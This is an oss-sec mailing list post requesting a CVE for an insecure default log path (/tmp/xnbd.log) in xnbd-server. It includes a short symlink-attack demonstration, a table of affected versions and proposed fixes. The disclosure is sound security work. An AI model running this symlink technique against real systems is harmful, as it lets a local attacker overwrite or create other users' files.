oss-sec mailing list archives

CVE request: Insecure default log file path in xNBD

From: Sebastian Pipping <sebastian () pipping org>
Date: Wed, 06 Feb 2013 17:48:59 +0100

Hello oss-security!


Target software
===============

xNBD upstream
  https://bitbucket.org/hirofuchi/xnbd

Official Debian packages
  http://packages.debian.org/sid/xnbd-server


Description
===========

xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.

The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there
is a vulnerability against symlinks attacks.


Demonstration
=============

Here is an exploitation example:

  $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

  $ touch DISK
  $ truncate --size=$((100*1024**2)) DISK

  $ /usr/sbin/xnbd-server --daemonize --target DISK
  xnbd-server(12462) msg: daemonize enabled
  xnbd-server(12462) msg: cmd target mode
  xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
  xnbd-server(12462) msg: xnbd master initialization done
  xnbd-server(12462) msg: logfile /tmp/xnbd.log

  $ ls -l ~/ATTACK_TARGET
  -rw------- 1 user123 user123 653 Feb  1 16:41 \
    /home/user123/ATTACK_TARGET


Affected versions
=================

The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

----------------------------------------------------------------------
  Version                        Status
----------------------------------------------------------------------
  0.0.x                          not analyzed
  0.1.0-pre                      VULNERABLE (xnbd-server only)
  0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
  Mercurial tip                  not vulnerable
----------------------------------------------------------------------


Options for a fix
=================

 a) Use syslog with --daemonize and no default file location in general
    (i.e. what upstream did)

 b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
    for the hard-coded defaults

 c) Replace flag O_APPEND by O_EXCL  (secure but reducing functionality)

The attached patch applies approach (b) to version0.1.0-pre-hg20-e75b93a47722.



Best,



Sebastian

Attachment: xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch
Description:

Current thread:

CVE request: Insecure default log file path in xNBD Sebastian Pipping (Feb 06)
- Re: CVE request: Insecure default log file path in xNBD Kurt Seifried (Feb 06)